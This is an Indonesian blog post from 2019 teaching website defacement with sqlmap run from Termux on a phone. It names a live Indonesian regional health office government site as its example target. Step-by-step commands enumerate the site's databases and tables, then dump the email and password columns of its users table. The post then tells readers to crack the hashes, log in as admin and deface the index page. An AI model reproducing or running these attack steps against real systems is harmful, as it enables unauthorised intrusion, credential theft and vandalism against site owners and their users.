Kamis, 11 April 2019

Deface SQL Via Termux + Live Target

on   with Tidak ada komentar
Cara Deface Sqlmap Via
Termux 


Assalamualaikum.. Kali ini kita akan belajar deface website sqlmap via termux:V".. pasti kalian semua tau apa yg namanya termux.. kalaw kalian belom tau google dulu sana anjg.. manja:V".. aowkowkwoaowko gk ush bnyk cocot.. lngsng gass aja..

- Termux ( download diplaystore )
- Dork ( Cari digoogle )
- Pasang Tool Sqlmapnya dulu 
$ apt update 
$ apt install python
$ apt install python2
$ apt install git 
$ git clone https://github.com/sqlmapproject/sqlmap 
- Internet + Ketamvanan
Langkah pertama install dulu toolsna.. kalaw sudah tinggal jalanin caranya 
$cd sqlmap

Kemudian baru kita inject":V".. pertama" kita perintahkan
$ python2 sqlmap.py -u (target) --dbs
Contoh : 
$ python2 sqlmap.py -u http://dinkes.sungaipenuhkota.go.id/index/berita/2 --dbs


Kalaw sudah pasti akan muncul data basenya.. trs kita masukan perintah kedua 
$ python2 sqlmap.py -u (target) -D (database) --tables
Contoh :
$ python2 sqlmap.py -u http://dinkes.sungaipenuhkota.go.id/index/berita/2 -D c5dinkes2821 --tables


Disitu kita nemuin user, tinggal kita cari tau data dari user tersebut
Dri column..
$ python2 sqlmap.py -u (target) -D (database) -T (NamaTable) --columns
Contoh :
$ python2 sqlmap.py -u http://dinkes.sungaipenuhkota.go.id/index/berita/2 -D c5dinkes2821 -T users --columns


klo sudah akan muncul data colum user tersebut, tinggal kita pilih email dan password atau username dan password yg akan kita cari.. kalaw gw mending satu-satu biar gk ribet.. 
$ python2 sqlmap.py -u (target) -D (database) -T (NamaTable) -C (namadatacolumn) --dump
Contoh :
$ python2 sqlmap.py -u http://dinkes.sungaipenuhkota.go.id/index/berita/2 -D c5dinkes2821 -T users -C email --dump


Kalaw password nya tinggal ubah aja tulisan emailnya..
$ python2 sqlmap.py -u http://dinkes.sungaipenuhkota.go.id/index/berita/2 -D c5dinkes2821 -T users -C password --dump


Terakhir maka akan muncul data email dan pass yg tadi kita dump
Tinggal kalian hash aja passwordnya di hashkiller.. lalu kalian cari admin loginnya.. trs kalian login dah.. kalaw mau nebas index jangan lupa backup dulu kasian adminnya:V".. okok sekian dari gw
#Thanks For Reading
Share:

0 komentar:

Posting Komentar